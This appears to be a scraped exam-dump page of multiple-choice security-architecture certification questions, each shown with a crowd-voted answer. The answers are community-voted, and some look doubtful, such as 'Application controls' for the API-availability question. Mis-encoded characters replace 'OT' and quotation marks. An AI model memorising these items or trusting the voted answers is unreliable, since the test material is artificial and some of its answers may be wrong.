A recent data breach revealed that a company has a number of files containing customer data across its storage environment. These files are individualized for each employee and are used in tracking various customer orders, inquiries, and issues. The files are not encrypted and can be accessed by anyone. The senior management team would like to address these issues without interrupting existing processes.Which of the following should a security architect recommend? A. A DLP program to identify which files have customer data and delete them B. An ERP program to identify which processes need to be tracked C. A CMDB to report on systems that are not configured to security baselines D. A CRM application to consolidate the data and provision access based on the process and need
D. A CRM application to consolidate the data and provision access based on the process and need Most Voted Hide Solution
A review of the past year's attack patterns shows that attackers stopped reconnaissance after finding a susceptible system to compromise. The company would like to find a way to use this information to protect the environment while still gaining valuable attack information.Which of the following would be BEST for the company to implement? A. A WAF B. An IDS C. A SIEM D. A honeypot Reveal Solution
D. A honeypot Hide Solution
A company's product site recently had failed API calls, resulting in customers being unable to check out and purchase products. This type of failure could lead to the loss of customers and damage to the company's reputation in the market.Which of the following should the company implement to address the risk of system unavailability? A. User and entity behavior analytics B. Redundant reporting systems C. A self-healing system D. Application controls
D. Application controls Most Voted Hide Solution
Which of the following is the MOST important security objective when applying cryptography to control messages that tell an ICS how much electrical power to output? A. Improving the availability of messages B. Ensuring non-repudiation of messages C. Enforcing protocol conformance for messages D. Assuring the integrity of messages
D. Assuring the integrity of messages Most Voted Hide Solution
A developer is creating a new mobile application for a company. The application uses REST API and TLS 1.2 to communicate securely with the external back-end server. Due to this configuration, the company is concerned about HTTPS interception attacks.Which of the following would be the BEST solution against this type of attack? A. Cookies B. Wildcard certificates C. HSTS D. Certificate pinning
D. Certificate pinning Most Voted
Which of the following allows computation and analysis of data within a ciphertext without knowledge of the plaintext? A. Lattice-based cryptography B. Quantum computing C. Asymmetric cryptography D. Homomorphic encryption
D. Homomorphic encryption Most Voted
An organization is developing a disaster recovery plan that requires data to be backed up and available at a moment's notice.Which of the following should the organization consider FIRST to address this requirement? A. Implement a change management plan to ensure systems are using the appropriate versions. B. Hire additional on-call staff to be deployed if an event occurs. C. Design an appropriate warm site for business continuity. D. Identify critical business processes and determine associated software and hardware requirements.
D. Identify critical business processes and determine associated software and hardware requirements. Most Voted Hide Solution
Which of the following is a benefit of using steganalysis techniques in forensic response? A. Breaking a symmetric cipher used in secure voice communications B. Determining the frequency of unique attacks against DRM-protected media C. Maintaining chain of custody for acquired evidence D. Identifying least significant bit encoding of data in a .wav file
D. Identifying least significant bit encoding of data in a .wav file Most Voted
An organization's hunt team thinks a persistent threats exists and already has a foothold in the enterprise network.Which of the following techniques would be BEST for the hunt team to use to entice the adversary to uncover malicious activity? A. Deploy a SOAR tool. B. Modify user password history and length requirements. C. Apply new isolation and segmentation schemes. D. Implement decoy files on adjacent hosts.
D. Implement decoy files on adjacent hosts.
A host on a company's network has been infected by a worm that appears to be spreading via SMB. A security analyst has been tasked with containing the incident while also maintaining evidence for a subsequent investigation and malware analysis.Which of the following steps would be best to perform FIRST? A. Turn off the infected host immediately. B. Run a full anti-malware scan on the infected host. C. Modify the smb.conf file of the host to prevent outgoing SMB connections. D. Isolate the infected host from the network by removing all network connections.
D. Isolate the infected host from the network by removing all network connections. Hide Solution
A networking team asked a security administrator to enable Flash on its web browser. The networking team explained that an important legacy embedded system gathers SNMP information from various devices. The system can only be managed through a web browser running Flash. The embedded system will be replaced within the year but is still critical at the moment.Which of the following should the security administrator do to mitigate the risk? A. Explain to the networking team the reason Flash is no longer available and insist the team move up the timetable for replacement. B. Air gap the legacy system from the network and dedicate a laptop with an end-of-life OS on it to connect to the system via crossover cable for management. C. Suggest that the networking team contact the original embedded system's vendor to get an update to the system that does not require Flash. D. Isolate the management interface to a private VLAN w
D. Isolate the management interface to a private VLAN where a legacy browser in a VM can be used as needed to manage the system. Hide Solution
A company has hired a third party to develop software as part of its strategy to be quicker to market. The company's policy outlines the following requirements:✑ The credentials used to publish production software to the container registry should be stored in a secure location.✑ Access should be restricted to the pipeline service account, without the ability for the third-party developer to read the credentials directly.Which of the following would be the BEST recommendation for storing and monitoring access to these shared credentials? A. TPM B. Local secure password file C. MFA D. Key vault
D. Key vault
A vulnerability analyst identified a zero-day vulnerability in a company's internally developed software. Since the current vulnerability management system does not have any checks for this vulnerability, an engineer has been asked to create one.Which of the following would be BEST suited to meet these requirements? A. ARF B. ISACs C. Node.js D. OVAL
D. OVAL Most Voted
A disaster recovery team learned of several mistakes that were made during the last disaster recovery parallel test. Computational resources ran out at 70% of restoration of critical services.Which of the following should be modified to prevent the issue from reoccurring? A. Recovery point objective B. Recovery time objective C. Mission-essential functions D. Recovery service level
D. Recovery service level Most Voted
An energy company is required to report the average pressure of natural gas used over the past quarter. A PLC sends data to a historian server that creates the required reports.Which of the following historian server locations will allow the business to get the required reports in an ׀׀¢ and IT environment? A. In the ׀׀¢ environment, use a VPN from the IT environment into the ׀׀¢ environment. B. In the ׀׀¢ environment, allow IT traffic into the ׀׀¢ environment. C. In the IT environment, allow PLCs to send data from the ׀׀¢ environment to the IT environment. D. Use a screened subnet between the ׀׀¢ and IT environments.
D. Use a screened subnet between the ׀׀¢ and IT environments. Most Voted
An enterprise is deploying APIs that utilize a private key and a public key to ensure the connection string is protected. To connect to the API, customers must use the private key.Which of the following would BEST secure the REST API connection to the database while preventing the use of a hard-coded string in the request string? A. Implement a VPN for all APIs. B. Sign the key with DSA. C. Deploy MFA for the service accounts. D. Utilize HMAC for the keys.
D. Utilize HMAC for the keys. Most Voted Hide Solution
A security analyst is reviewing network connectivity on a Linux workstation and examining the active TCP connections using the command line.Which of the following commands would be the BEST to run to view only active Internet connections? A. sudo netstat -antu | grep ג€LISTENג€ | awk '{print$5}' B. sudo netstat -nlt -p | grep ג€ESTABLISHEDג€ C. sudo netstat -plntu | grep -v ג€Foreign Addressג€ D. sudo netstat -pnut -w | column -t -s $'\w' E. sudo netstat -pnut | grep -P ^tcp
E. sudo netstat -pnut | grep -P ^tcp Most Voted